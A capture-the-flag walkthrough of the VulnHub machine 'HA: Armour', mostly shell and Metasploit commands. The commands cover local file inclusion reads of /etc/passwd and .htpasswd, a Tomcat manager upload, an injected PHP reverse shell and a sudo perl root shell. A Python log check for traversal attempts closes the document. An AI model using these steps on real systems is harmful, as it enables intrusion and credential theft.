Environment
Virtualization platform: VMware Workstation Pro
Attacker machine: Kali (IP: 192.168.253.136)
Target machine: Armour (IP: 192.168.253.150)
Download: https://www.vulnhub.com/entry/ha-armour,370/
Let’s go
nmap -A -p- 192.168.253.150
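The page source contains some information.
Requesting notes.txt through the web server shows that the file does not exist; it may be related to port 69.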
nmap -p69 192.168.253.150 -sU
tftp 192.168.253.150
get notes.txt
dirscan -u http://192.168.253.150/ -E
curl http://192.168.253.150/file.php?file=/etc/passwd
curl http://192.168.253.150/file.php?file=/etc/apache2/.htpasswd
ssh 192.168.253.150 -p 65534
The three hints combined can be used as the password; with the information obtained, you can log in to Tomcat.
msfconsole
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.253.150
set rport 8080
set httpusername armour
set httppassword TheOlympicsmaybeevenaStarBucks
set target 2
run
portfwd add -l 8081 -r 127.0.0.1 -p 8081
ls /etc/apache2/apache2.conf
download /etc/apache2/apache2.conf
cd /etc/apache2/
upload apache2.conf
A restart is needed here.
cat ./Assorted/php-reverse-shell.php >> apache2.conf
upload apache2.conf
curl http://192.168.253.150/file.php?file=/etc/apache2/apache2.conf
sudo -l
sudo perl -e 'exec "/bin/sh";'
cd /root
cat final.txt
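
A defender's view of the file.php?file= requests used in this walkthrough, as an added example that is not part of the original write-up: a Python check that flags access-log requests whose file parameter is an absolute path or resolves outside the web root. The log lines, the web root /var/www/html and the function names are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not taken from the target).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /file.php?file=about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /file.php?file=/etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.88"
192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /file.php?file=%2Fetc%2Fapache2%2F.htpasswd HTTP/1.1" 200 61 "-" "curl/7.88"
192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /file.php?file=pages/../../../etc/apache2/apache2.conf HTTP/1.1" 200 7224 "-" "curl/7.88"
192.0.2.13 - - [01/Jan/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# client, method, request target, status code
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
BASE_DIR = "/var/www/html"  # assumed web root; adjust to the real DocumentRoot


def classify(value, base_dir=BASE_DIR):
    """Return a reason string if the value escapes base_dir, else None."""
    if "\x00" in value:
        return "null byte"
    if value.startswith("/"):
        return "absolute path"
    # Resolve ../ segments the same way the filesystem would.
    resolved = posixpath.normpath(posixpath.join(base_dir, value))
    if resolved != base_dir and not resolved.startswith(base_dir + "/"):
        return "directory traversal"
    return None


def find_lfi_attempts(log_text, endpoint="/file.php", param="file"):
    """Return (client, decoded value, reason, status) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, _method, target, status = match.groups()
        url = urlsplit(target)
        if url.path != endpoint:
            continue
        # parse_qs percent-decodes, so %2Fetc%2F... is checked as /etc/...
        for value in parse_qs(url.query).get(param, []):
            reason = classify(value)
            if reason:
                findings.append((client, value, reason, int(status)))
    return findings
```

The same classify() logic, applied server-side before the file is read, is the corresponding fix: reject any value that does not resolve inside the intended directory.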